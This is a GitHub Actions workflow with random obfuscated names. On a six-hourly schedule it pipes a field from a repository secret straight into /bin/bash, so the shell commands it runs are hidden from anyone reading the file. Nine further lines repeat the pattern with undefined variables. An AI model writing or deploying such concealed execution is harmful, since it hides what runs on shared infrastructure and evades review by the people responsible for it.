name: nkchla
on:
  workflow_dispatch:
  schedule:
    - cron: '39 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nkchla
        env:
          v2: ${{ secrets.v2 }}
        run: |
          echo $v2 | jq -r .nz299 | /bin/bash
          echo $wjwgn4 | jq -r .lvep073 | /bin/bash
          echo $j572 | jq -r .bq67667 | /bin/bash
          echo $qj5 | jq -r .kz4981 | /bin/bash
          echo $uv262 | jq -r .mvam04 | /bin/bash
          echo $unz7860 | jq -r .phav3450 | /bin/bash
          echo $d26622 | jq -r .k39 | /bin/bash
          echo $ryo681 | jq -r .vlnzi951 | /bin/bash
          echo $zvui6581 | jq -r .hk9 | /bin/bash
          echo $vu115 | jq -r .zqkpe78 | /bin/bash

